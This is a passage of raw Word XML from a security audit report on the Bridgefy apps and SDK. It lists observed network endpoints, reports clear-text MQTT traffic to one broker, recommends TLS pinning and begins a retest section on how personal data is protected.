          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the code review and runtime analysis of the Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and SDK, 7ASecurity identified network traffic to the following endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ws://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.131.221.30:8083/mqtt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>wss://staging.broker.bridgefy.services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId280">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://firebaseinstallations.googleapis.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId281">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://firebaseremoteconfig.googleapis.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId282">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://www.googleapis.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId283">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://securetoken.googleapis.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.app.bridgefy.services</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.sdk.bridgefy.services</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId284">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://api.stripe.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A summary of PII and device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q02</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The most concerning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>regard,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>communicate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.131.221.30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>broker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>allowing malicious attackers to inspect and modify network communications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>For the remaining endpoints, TLS validation was found to be implemented correctly. However, the current TLS and HTTP security headers configurations have room for improvement (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-001</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-042</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Once all these issues are resolved, strong consideration should be given to further protect TLS communications with Pinning. This will ensure that even high profile attackers, able to craft a certificate trusted by the Android and iOS operating systems (i.e. many governments, some companies), are unable to inspect or modify network traffic. More background and examples about this security control can be found in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP Pinning Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>187</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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1"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487635456">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>181374</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="122" name="Graphic 122"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="122" name="Graphic 122"/>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4.281446pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15681024;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape91" coordorigin="1440,286" coordsize="2880,0" path="m1440,286l4320,286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4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>187</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId285">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250010" w:id="45"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>How</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>protects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>transit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy team resolved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-016</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-017</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-018</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-036</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>during this assignment and 7ASecurity verified that the fixes are valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
